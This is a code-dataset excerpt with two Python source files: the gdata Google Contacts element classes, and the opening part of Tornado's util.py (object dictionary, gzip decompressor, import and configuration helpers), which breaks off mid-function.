Dataset schema (column: type and range):

- repo_name: string, 5–100 characters
- path: string, 4–299 characters
- copies: string, 990 distinct values
- size: string, 4–7 characters
- content: string, 666–1.03M characters
- license: string, 15 distinct values
- hash: int64, -9,223,351,895,964,839,000 to 9,223,297,778B
- line_mean: float64, 3.17–100
- line_max: int64, 7–1k
- alpha_frac: float64, 0.25–0.98
- autogenerated: bool, 1 class

repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---
kbdick/RecycleTracker | recyclecollector/scrap/gdata-2.0.18/src/gdata/contacts/__init__.py | 119 | 28208 | #!/usr/bin/env python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to ElementWrapper objects used with Google Contacts."""
__author__ = 'dbrattli (Dag Brattli)'
import atom
import gdata
## Constants from http://code.google.com/apis/gdata/elements.html ##
REL_HOME = 'http://schemas.google.com/g/2005#home'
REL_WORK = 'http://schemas.google.com/g/2005#work'
REL_OTHER = 'http://schemas.google.com/g/2005#other'
# AOL Instant Messenger protocol
IM_AIM = 'http://schemas.google.com/g/2005#AIM'
IM_MSN = 'http://schemas.google.com/g/2005#MSN' # MSN Messenger protocol
IM_YAHOO = 'http://schemas.google.com/g/2005#YAHOO' # Yahoo Messenger protocol
IM_SKYPE = 'http://schemas.google.com/g/2005#SKYPE' # Skype protocol
IM_QQ = 'http://schemas.google.com/g/2005#QQ' # QQ protocol
# Google Talk protocol
IM_GOOGLE_TALK = 'http://schemas.google.com/g/2005#GOOGLE_TALK'
IM_ICQ = 'http://schemas.google.com/g/2005#ICQ' # ICQ protocol
IM_JABBER = 'http://schemas.google.com/g/2005#JABBER' # Jabber protocol
IM_NETMEETING = 'http://schemas.google.com/g/2005#netmeeting' # NetMeeting
PHOTO_LINK_REL = 'http://schemas.google.com/contacts/2008/rel#photo'
PHOTO_EDIT_LINK_REL = 'http://schemas.google.com/contacts/2008/rel#edit-photo'
# Different phone types, for more info see:
# http://code.google.com/apis/gdata/docs/2.0/elements.html#gdPhoneNumber
PHONE_CAR = 'http://schemas.google.com/g/2005#car'
PHONE_FAX = 'http://schemas.google.com/g/2005#fax'
PHONE_GENERAL = 'http://schemas.google.com/g/2005#general'
PHONE_HOME = REL_HOME
PHONE_HOME_FAX = 'http://schemas.google.com/g/2005#home_fax'
PHONE_INTERNAL = 'http://schemas.google.com/g/2005#internal-extension'
PHONE_MOBILE = 'http://schemas.google.com/g/2005#mobile'
PHONE_OTHER = REL_OTHER
PHONE_PAGER = 'http://schemas.google.com/g/2005#pager'
PHONE_SATELLITE = 'http://schemas.google.com/g/2005#satellite'
PHONE_VOIP = 'http://schemas.google.com/g/2005#voip'
PHONE_WORK = REL_WORK
PHONE_WORK_FAX = 'http://schemas.google.com/g/2005#work_fax'
PHONE_WORK_MOBILE = 'http://schemas.google.com/g/2005#work_mobile'
PHONE_WORK_PAGER = 'http://schemas.google.com/g/2005#work_pager'
PHONE_MAIN = 'http://schemas.google.com/g/2005#main'
PHONE_ASSISTANT = 'http://schemas.google.com/g/2005#assistant'
PHONE_CALLBACK = 'http://schemas.google.com/g/2005#callback'
PHONE_COMPANY_MAIN = 'http://schemas.google.com/g/2005#company_main'
PHONE_ISDN = 'http://schemas.google.com/g/2005#isdn'
PHONE_OTHER_FAX = 'http://schemas.google.com/g/2005#other_fax'
PHONE_RADIO = 'http://schemas.google.com/g/2005#radio'
PHONE_TELEX = 'http://schemas.google.com/g/2005#telex'
PHONE_TTY_TDD = 'http://schemas.google.com/g/2005#tty_tdd'
EXTERNAL_ID_ORGANIZATION = 'organization'
RELATION_MANAGER = 'manager'
CONTACTS_NAMESPACE = 'http://schemas.google.com/contact/2008'
class GDataBase(atom.AtomBase):
"""The Google Contacts intermediate class from atom.AtomBase."""
_namespace = gdata.GDATA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, text=None,
extension_elements=None, extension_attributes=None):
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
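# Note (added for readability, not in the original source): every element class
# in this module follows the same declarative pattern inherited from
# atom.AtomBase -- `_tag` and `_namespace` name the XML element, while the
# `_children` and `_attributes` dictionaries map qualified child tags and XML
# attribute names to Python attribute names, which is what drives parsing and
# serialization.  Subclasses copy the parent dictionaries before extending them
# so the parent mappings are not mutated.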
class ContactsBase(GDataBase):
"""The Google Contacts intermediate class for Contacts namespace."""
_namespace = CONTACTS_NAMESPACE
class OrgName(GDataBase):
"""The Google Contacts OrgName element."""
_tag = 'orgName'
class OrgTitle(GDataBase):
"""The Google Contacts OrgTitle element."""
_tag = 'orgTitle'
class OrgDepartment(GDataBase):
"""The Google Contacts OrgDepartment element."""
_tag = 'orgDepartment'
class OrgJobDescription(GDataBase):
"""The Google Contacts OrgJobDescription element."""
_tag = 'orgJobDescription'
class Where(GDataBase):
"""The Google Contacts Where element."""
_tag = 'where'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['label'] = 'label'
_attributes['valueString'] = 'value_string'
def __init__(self, value_string=None, rel=None, label=None,
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.rel = rel
self.label = label
self.value_string = value_string
class When(GDataBase):
"""The Google Contacts When element."""
_tag = 'when'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['startTime'] = 'start_time'
_attributes['endTime'] = 'end_time'
_attributes['label'] = 'label'
def __init__(self, start_time=None, end_time=None, label=None,
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.start_time = start_time
self.end_time = end_time
self.label = label
class Organization(GDataBase):
"""The Google Contacts Organization element."""
_tag = 'organization'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_attributes['primary'] = 'primary'
_children['{%s}orgName' % GDataBase._namespace] = (
'org_name', OrgName)
_children['{%s}orgTitle' % GDataBase._namespace] = (
'org_title', OrgTitle)
_children['{%s}orgDepartment' % GDataBase._namespace] = (
'org_department', OrgDepartment)
_children['{%s}orgJobDescription' % GDataBase._namespace] = (
'org_job_description', OrgJobDescription)
#_children['{%s}where' % GDataBase._namespace] = ('where', Where)
def __init__(self, label=None, rel=None, primary='false', org_name=None,
org_title=None, org_department=None, org_job_description=None,
where=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel or REL_OTHER
self.primary = primary
self.org_name = org_name
self.org_title = org_title
self.org_department = org_department
self.org_job_description = org_job_description
self.where = where
class PostalAddress(GDataBase):
"""The Google Contacts PostalAddress element."""
_tag = 'postalAddress'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['primary'] = 'primary'
def __init__(self, primary=None, rel=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.rel = rel or REL_OTHER
self.primary = primary
class FormattedAddress(GDataBase):
"""The Google Contacts FormattedAddress element."""
_tag = 'formattedAddress'
class StructuredPostalAddress(GDataBase):
"""The Google Contacts StructuredPostalAddress element."""
_tag = 'structuredPostalAddress'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['primary'] = 'primary'
_children['{%s}formattedAddress' % GDataBase._namespace] = (
'formatted_address', FormattedAddress)
def __init__(self, rel=None, primary=None,
formatted_address=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.rel = rel or REL_OTHER
self.primary = primary
self.formatted_address = formatted_address
class IM(GDataBase):
"""The Google Contacts IM element."""
_tag = 'im'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['address'] = 'address'
_attributes['primary'] = 'primary'
_attributes['protocol'] = 'protocol'
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
def __init__(self, primary='false', rel=None, address=None, protocol=None,
label=None, text=None,
extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.protocol = protocol
self.address = address
self.primary = primary
self.rel = rel or REL_OTHER
self.label = label
class Email(GDataBase):
"""The Google Contacts Email element."""
_tag = 'email'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['address'] = 'address'
_attributes['primary'] = 'primary'
_attributes['rel'] = 'rel'
_attributes['label'] = 'label'
def __init__(self, label=None, rel=None, address=None, primary='false',
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel or REL_OTHER
self.address = address
self.primary = primary
class PhoneNumber(GDataBase):
"""The Google Contacts PhoneNumber element."""
_tag = 'phoneNumber'
_children = GDataBase._children.copy()
_attributes = GDataBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_attributes['uri'] = 'uri'
_attributes['primary'] = 'primary'
def __init__(self, label=None, rel=None, uri=None, primary='false',
text=None, extension_elements=None, extension_attributes=None):
GDataBase.__init__(self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel or REL_OTHER
self.uri = uri
self.primary = primary
class Nickname(ContactsBase):
"""The Google Contacts Nickname element."""
_tag = 'nickname'
class Occupation(ContactsBase):
"""The Google Contacts Occupation element."""
_tag = 'occupation'
class Gender(ContactsBase):
"""The Google Contacts Gender element."""
_tag = 'gender'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['value'] = 'value'
def __init__(self, value=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.value = value
class Birthday(ContactsBase):
"""The Google Contacts Birthday element."""
_tag = 'birthday'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['when'] = 'when'
def __init__(self, when=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.when = when
class Relation(ContactsBase):
"""The Google Contacts Relation element."""
_tag = 'relation'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
def __init__(self, label=None, rel=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel
def RelationFromString(xml_string):
return atom.CreateClassFromXMLString(Relation, xml_string)
class UserDefinedField(ContactsBase):
"""The Google Contacts UserDefinedField element."""
_tag = 'userDefinedField'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['key'] = 'key'
_attributes['value'] = 'value'
def __init__(self, key=None, value=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.key = key
self.value = value
def UserDefinedFieldFromString(xml_string):
return atom.CreateClassFromXMLString(UserDefinedField, xml_string)
class Website(ContactsBase):
"""The Google Contacts Website element."""
_tag = 'website'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['href'] = 'href'
_attributes['label'] = 'label'
_attributes['primary'] = 'primary'
_attributes['rel'] = 'rel'
def __init__(self, href=None, label=None, primary='false', rel=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.href = href
self.label = label
self.primary = primary
self.rel = rel
def WebsiteFromString(xml_string):
return atom.CreateClassFromXMLString(Website, xml_string)
class ExternalId(ContactsBase):
"""The Google Contacts ExternalId element."""
_tag = 'externalId'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_attributes['value'] = 'value'
def __init__(self, label=None, rel=None, value=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel
self.value = value
def ExternalIdFromString(xml_string):
return atom.CreateClassFromXMLString(ExternalId, xml_string)
class Event(ContactsBase):
"""The Google Contacts Event element."""
_tag = 'event'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['label'] = 'label'
_attributes['rel'] = 'rel'
_children['{%s}when' % ContactsBase._namespace] = ('when', When)
def __init__(self, label=None, rel=None, when=None,
text=None, extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.label = label
self.rel = rel
self.when = when
def EventFromString(xml_string):
return atom.CreateClassFromXMLString(Event, xml_string)
class Deleted(GDataBase):
"""The Google Contacts Deleted element."""
_tag = 'deleted'
class GroupMembershipInfo(ContactsBase):
"""The Google Contacts GroupMembershipInfo element."""
_tag = 'groupMembershipInfo'
_children = ContactsBase._children.copy()
_attributes = ContactsBase._attributes.copy()
_attributes['deleted'] = 'deleted'
_attributes['href'] = 'href'
def __init__(self, deleted=None, href=None, text=None,
extension_elements=None, extension_attributes=None):
ContactsBase.__init__(self, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.deleted = deleted
self.href = href
class PersonEntry(gdata.BatchEntry):
"""Base class for ContactEntry and ProfileEntry."""
_children = gdata.BatchEntry._children.copy()
_children['{%s}organization' % gdata.GDATA_NAMESPACE] = (
'organization', [Organization])
_children['{%s}phoneNumber' % gdata.GDATA_NAMESPACE] = (
'phone_number', [PhoneNumber])
_children['{%s}nickname' % CONTACTS_NAMESPACE] = ('nickname', Nickname)
_children['{%s}occupation' % CONTACTS_NAMESPACE] = ('occupation', Occupation)
_children['{%s}gender' % CONTACTS_NAMESPACE] = ('gender', Gender)
_children['{%s}birthday' % CONTACTS_NAMESPACE] = ('birthday', Birthday)
_children['{%s}postalAddress' % gdata.GDATA_NAMESPACE] = ('postal_address',
[PostalAddress])
_children['{%s}structuredPostalAddress' % gdata.GDATA_NAMESPACE] = (
'structured_postal_address', [StructuredPostalAddress])
_children['{%s}email' % gdata.GDATA_NAMESPACE] = ('email', [Email])
_children['{%s}im' % gdata.GDATA_NAMESPACE] = ('im', [IM])
_children['{%s}relation' % CONTACTS_NAMESPACE] = ('relation', [Relation])
_children['{%s}userDefinedField' % CONTACTS_NAMESPACE] = (
'user_defined_field', [UserDefinedField])
_children['{%s}website' % CONTACTS_NAMESPACE] = ('website', [Website])
_children['{%s}externalId' % CONTACTS_NAMESPACE] = (
'external_id', [ExternalId])
_children['{%s}event' % CONTACTS_NAMESPACE] = ('event', [Event])
# The following line should be removed once the Python support
# for GData 2.0 is mature.
_attributes = gdata.BatchEntry._attributes.copy()
_attributes['{%s}etag' % gdata.GDATA_NAMESPACE] = 'etag'
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None, organization=None, phone_number=None,
nickname=None, occupation=None, gender=None, birthday=None,
postal_address=None, structured_postal_address=None, email=None,
im=None, relation=None, user_defined_field=None, website=None,
external_id=None, event=None, batch_operation=None,
batch_id=None, batch_status=None, text=None,
extension_elements=None, extension_attributes=None, etag=None):
gdata.BatchEntry.__init__(self, author=author, category=category,
content=content, atom_id=atom_id, link=link,
published=published,
batch_operation=batch_operation,
batch_id=batch_id, batch_status=batch_status,
title=title, updated=updated)
self.organization = organization or []
self.phone_number = phone_number or []
self.nickname = nickname
self.occupation = occupation
self.gender = gender
self.birthday = birthday
self.postal_address = postal_address or []
self.structured_postal_address = structured_postal_address or []
self.email = email or []
self.im = im or []
self.relation = relation or []
self.user_defined_field = user_defined_field or []
self.website = website or []
self.external_id = external_id or []
self.event = event or []
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
# The following line should be removed once the Python support
# for GData 2.0 is mature.
self.etag = etag
class ContactEntry(PersonEntry):
"""A Google Contact flavor of an Atom Entry."""
_children = PersonEntry._children.copy()
_children['{%s}deleted' % gdata.GDATA_NAMESPACE] = ('deleted', Deleted)
_children['{%s}groupMembershipInfo' % CONTACTS_NAMESPACE] = (
'group_membership_info', [GroupMembershipInfo])
_children['{%s}extendedProperty' % gdata.GDATA_NAMESPACE] = (
'extended_property', [gdata.ExtendedProperty])
# Overwrite the organization rule in PersonEntry so that a ContactEntry
# may only contain one <gd:organization> element.
_children['{%s}organization' % gdata.GDATA_NAMESPACE] = (
'organization', Organization)
def __init__(self, author=None, category=None, content=None,
atom_id=None, link=None, published=None,
title=None, updated=None, organization=None, phone_number=None,
nickname=None, occupation=None, gender=None, birthday=None,
postal_address=None, structured_postal_address=None, email=None,
im=None, relation=None, user_defined_field=None, website=None,
external_id=None, event=None, batch_operation=None,
batch_id=None, batch_status=None, text=None,
extension_elements=None, extension_attributes=None, etag=None,
deleted=None, extended_property=None,
group_membership_info=None):
PersonEntry.__init__(self, author=author, category=category,
content=content, atom_id=atom_id, link=link,
published=published, title=title, updated=updated,
organization=organization, phone_number=phone_number,
nickname=nickname, occupation=occupation,
gender=gender, birthday=birthday,
postal_address=postal_address,
structured_postal_address=structured_postal_address,
email=email, im=im, relation=relation,
user_defined_field=user_defined_field,
website=website, external_id=external_id, event=event,
batch_operation=batch_operation, batch_id=batch_id,
batch_status=batch_status, text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes, etag=etag)
self.deleted = deleted
self.extended_property = extended_property or []
self.group_membership_info = group_membership_info or []
def GetPhotoLink(self):
for a_link in self.link:
if a_link.rel == PHOTO_LINK_REL:
return a_link
return None
def GetPhotoEditLink(self):
for a_link in self.link:
if a_link.rel == PHOTO_EDIT_LINK_REL:
return a_link
return None
def ContactEntryFromString(xml_string):
return atom.CreateClassFromXMLString(ContactEntry, xml_string)
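# Illustrative sketch (not part of the original module): parsing a contact
# entry and reading its typed sub-elements.  `xml_string` is a hypothetical
# Atom payload as returned by the Contacts API.
#
#   entry = ContactEntryFromString(xml_string)
#   for email in entry.email:
#       print email.address, email.rel
#   photo_link = entry.GetPhotoLink()
#   if photo_link is not None:
#       print photo_link.href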
class ContactsFeed(gdata.BatchFeed, gdata.LinkFinder):
"""A Google Contacts feed flavor of an Atom Feed."""
_children = gdata.BatchFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [ContactEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.BatchFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def ContactsFeedFromString(xml_string):
return atom.CreateClassFromXMLString(ContactsFeed, xml_string)
class GroupEntry(gdata.BatchEntry):
"""Represents a contact group."""
_children = gdata.BatchEntry._children.copy()
_children['{%s}extendedProperty' % gdata.GDATA_NAMESPACE] = (
'extended_property', [gdata.ExtendedProperty])
def __init__(self, author=None, category=None, content=None,
contributor=None, atom_id=None, link=None, published=None,
rights=None, source=None, summary=None, control=None,
title=None, updated=None,
extended_property=None, batch_operation=None, batch_id=None,
batch_status=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.BatchEntry.__init__(self, author=author, category=category,
content=content,
atom_id=atom_id, link=link, published=published,
batch_operation=batch_operation,
batch_id=batch_id, batch_status=batch_status,
title=title, updated=updated)
self.extended_property = extended_property or []
def GroupEntryFromString(xml_string):
return atom.CreateClassFromXMLString(GroupEntry, xml_string)
class GroupsFeed(gdata.BatchFeed):
"""A Google contact groups feed flavor of an Atom Feed."""
_children = gdata.BatchFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [GroupEntry])
def GroupsFeedFromString(xml_string):
return atom.CreateClassFromXMLString(GroupsFeed, xml_string)
class ProfileEntry(PersonEntry):
"""A Google Profiles flavor of an Atom Entry."""
def ProfileEntryFromString(xml_string):
"""Converts an XML string into a ProfileEntry object.
Args:
xml_string: string The XML describing a Profile entry.
Returns:
A ProfileEntry object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(ProfileEntry, xml_string)
class ProfilesFeed(gdata.BatchFeed, gdata.LinkFinder):
"""A Google Profiles feed flavor of an Atom Feed."""
_children = gdata.BatchFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [ProfileEntry])
def __init__(self, author=None, category=None, contributor=None,
generator=None, icon=None, atom_id=None, link=None, logo=None,
rights=None, subtitle=None, title=None, updated=None,
entry=None, total_results=None, start_index=None,
items_per_page=None, extension_elements=None,
extension_attributes=None, text=None):
gdata.BatchFeed.__init__(self, author=author, category=category,
contributor=contributor, generator=generator,
icon=icon, atom_id=atom_id, link=link,
logo=logo, rights=rights, subtitle=subtitle,
title=title, updated=updated, entry=entry,
total_results=total_results,
start_index=start_index,
items_per_page=items_per_page,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
def ProfilesFeedFromString(xml_string):
"""Converts an XML string into a ProfilesFeed object.
Args:
xml_string: string The XML describing a Profiles feed.
Returns:
A ProfilesFeed object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(ProfilesFeed, xml_string)
| gpl-3.0 | 4,873,943,453,772,972,000 | 37.118919 | 79 | 0.654991 | false |
doot/CouchPotatoServer | libs/tornado/util.py | 102 | 12256 | """Miscellaneous utility functions and classes.
This module is used internally by Tornado. It is not necessarily expected
that the functions and classes defined here will be useful to other
applications, but they are documented here in case they are.
The one public-facing part of this module is the `Configurable` class
and its `~Configurable.configure` method, which becomes a part of the
interface of its subclasses, including `.AsyncHTTPClient`, `.IOLoop`,
and `.Resolver`.
"""
from __future__ import absolute_import, division, print_function, with_statement
import array
import inspect
import os
import sys
import zlib
try:
xrange # py2
except NameError:
xrange = range # py3
class ObjectDict(dict):
"""Makes a dictionary behave like an object, with attribute-style access.
"""
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self[name] = value
class GzipDecompressor(object):
"""Streaming gzip decompressor.
    The interface is like that of `zlib.decompressobj` (without some of the
    optional arguments), but it understands gzip headers and checksums.
"""
def __init__(self):
# Magic parameter makes zlib module understand gzip header
# http://stackoverflow.com/questions/1838699/how-can-i-decompress-a-gzip-stream-with-zlib
# This works on cpython and pypy, but not jython.
self.decompressobj = zlib.decompressobj(16 + zlib.MAX_WBITS)
def decompress(self, value, max_length=None):
"""Decompress a chunk, returning newly-available data.
Some data may be buffered for later processing; `flush` must
be called when there is no more input data to ensure that
all data was processed.
If ``max_length`` is given, some input data may be left over
in ``unconsumed_tail``; you must retrieve this value and pass
it back to a future call to `decompress` if it is not empty.
"""
return self.decompressobj.decompress(value, max_length)
@property
def unconsumed_tail(self):
"""Returns the unconsumed portion left over
"""
return self.decompressobj.unconsumed_tail
def flush(self):
"""Return any remaining buffered data not yet returned by decompress.
Also checks for errors such as truncated input.
No other methods may be called on this object after `flush`.
"""
return self.decompressobj.flush()
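# Illustrative sketch (not part of the original module): decompressing a gzip
# stream incrementally.  `chunks` is a hypothetical iterable of byte strings.
#
#   decompressor = GzipDecompressor()
#   pieces = []
#   for chunk in chunks:
#       pieces.append(decompressor.decompress(chunk))
#   pieces.append(decompressor.flush())   # also checks the trailing checksum
#   data = b''.join(pieces)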
def import_object(name):
"""Imports an object by name.
import_object('x') is equivalent to 'import x'.
import_object('x.y.z') is equivalent to 'from x.y import z'.
>>> import tornado.escape
>>> import_object('tornado.escape') is tornado.escape
True
>>> import_object('tornado.escape.utf8') is tornado.escape.utf8
True
>>> import_object('tornado') is tornado
True
>>> import_object('tornado.missing_module')
Traceback (most recent call last):
...
ImportError: No module named missing_module
"""
if name.count('.') == 0:
return __import__(name, None, None)
parts = name.split('.')
obj = __import__('.'.join(parts[:-1]), None, None, [parts[-1]], 0)
try:
return getattr(obj, parts[-1])
except AttributeError:
raise ImportError("No module named %s" % parts[-1])
# Fake unicode literal support: Python 3.2 doesn't have the u'' marker for
# literal strings, and alternative solutions like "from __future__ import
# unicode_literals" have other problems (see PEP 414). u() can be applied
# to ascii strings that include \u escapes (but they must not contain
# literal non-ascii characters).
if type('') is not type(b''):
def u(s):
return s
unicode_type = str
basestring_type = str
else:
def u(s):
return s.decode('unicode_escape')
unicode_type = unicode
basestring_type = basestring
# Deprecated alias that was used before we dropped py25 support.
# Left here in case anyone outside Tornado is using it.
bytes_type = bytes
if sys.version_info > (3,):
exec("""
def raise_exc_info(exc_info):
raise exc_info[1].with_traceback(exc_info[2])
def exec_in(code, glob, loc=None):
if isinstance(code, str):
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec(code, glob, loc)
""")
else:
exec("""
def raise_exc_info(exc_info):
raise exc_info[0], exc_info[1], exc_info[2]
def exec_in(code, glob, loc=None):
if isinstance(code, basestring):
# exec(string) inherits the caller's future imports; compile
# the string first to prevent that.
code = compile(code, '<string>', 'exec', dont_inherit=True)
exec code in glob, loc
""")
def errno_from_exception(e):
"""Provides the errno from an Exception object.
There are cases that the errno attribute was not set so we pull
the errno out of the args but if someone instantiates an Exception
without any args you will get a tuple error. So this function
abstracts all that behavior to give you a safe way to get the
errno.
"""
if hasattr(e, 'errno'):
return e.errno
elif e.args:
return e.args[0]
else:
return None
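# Illustrative sketch (hypothetical values): the helper works whether or not
# the `errno` attribute was populated on the exception object.
#
#   try:
#       raise IOError(9, 'Bad file descriptor')
#   except IOError as e:
#       errno_from_exception(e)   # -> 9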
class Configurable(object):
"""Base class for configurable interfaces.
A configurable interface is an (abstract) class whose constructor
acts as a factory function for one of its implementation subclasses.
The implementation subclass as well as optional keyword arguments to
its initializer can be set globally at runtime with `configure`.
By using the constructor as the factory method, the interface
looks like a normal class, `isinstance` works as usual, etc. This
pattern is most useful when the choice of implementation is likely
to be a global decision (e.g. when `~select.epoll` is available,
always use it instead of `~select.select`), or when a
previously-monolithic class has been split into specialized
subclasses.
Configurable subclasses must define the class methods
`configurable_base` and `configurable_default`, and use the instance
method `initialize` instead of ``__init__``.
"""
__impl_class = None
__impl_kwargs = None
def __new__(cls, **kwargs):
base = cls.configurable_base()
args = {}
if cls is base:
impl = cls.configured_class()
if base.__impl_kwargs:
args.update(base.__impl_kwargs)
else:
impl = cls
args.update(kwargs)
instance = super(Configurable, cls).__new__(impl)
# initialize vs __init__ chosen for compatibility with AsyncHTTPClient
# singleton magic. If we get rid of that we can switch to __init__
# here too.
instance.initialize(**args)
return instance
@classmethod
def configurable_base(cls):
"""Returns the base class of a configurable hierarchy.
        This will normally return the class in which it is defined
        (which is *not* necessarily the same as the ``cls`` classmethod parameter).
"""
raise NotImplementedError()
@classmethod
def configurable_default(cls):
"""Returns the implementation class to be used if none is configured."""
raise NotImplementedError()
def initialize(self):
"""Initialize a `Configurable` subclass instance.
Configurable classes should use `initialize` instead of ``__init__``.
"""
@classmethod
def configure(cls, impl, **kwargs):
"""Sets the class to use when the base class is instantiated.
Keyword arguments will be saved and added to the arguments passed
to the constructor. This can be used to set global defaults for
some parameters.
"""
base = cls.configurable_base()
if isinstance(impl, (unicode_type, bytes)):
impl = import_object(impl)
if impl is not None and not issubclass(impl, cls):
raise ValueError("Invalid subclass of %s" % cls)
base.__impl_class = impl
base.__impl_kwargs = kwargs
@classmethod
def configured_class(cls):
"""Returns the currently configured class."""
base = cls.configurable_base()
if cls.__impl_class is None:
base.__impl_class = cls.configurable_default()
return base.__impl_class
@classmethod
def _save_configuration(cls):
base = cls.configurable_base()
return (base.__impl_class, base.__impl_kwargs)
@classmethod
def _restore_configuration(cls, saved):
base = cls.configurable_base()
base.__impl_class = saved[0]
base.__impl_kwargs = saved[1]
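# Minimal sketch of the Configurable pattern (illustrative only; the class
# names below are hypothetical and not part of Tornado):
#
#   class MyInterface(Configurable):
#       @classmethod
#       def configurable_base(cls):
#           return MyInterface
#       @classmethod
#       def configurable_default(cls):
#           return MyDefaultImpl
#       def initialize(self, prefix=''):
#           self.prefix = prefix
#
#   class MyDefaultImpl(MyInterface):
#       pass
#
#   MyInterface.configure(MyDefaultImpl, prefix='x-')
#   obj = MyInterface()               # actually constructs a MyDefaultImpl
#   assert isinstance(obj, MyDefaultImpl) and obj.prefix == 'x-'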
class ArgReplacer(object):
"""Replaces one value in an ``args, kwargs`` pair.
Inspects the function signature to find an argument by name
whether it is passed by position or keyword. For use in decorators
and similar wrappers.
"""
def __init__(self, func, name):
self.name = name
try:
self.arg_pos = inspect.getargspec(func).args.index(self.name)
except ValueError:
# Not a positional parameter
self.arg_pos = None
def get_old_value(self, args, kwargs, default=None):
"""Returns the old value of the named argument without replacing it.
Returns ``default`` if the argument is not present.
"""
if self.arg_pos is not None and len(args) > self.arg_pos:
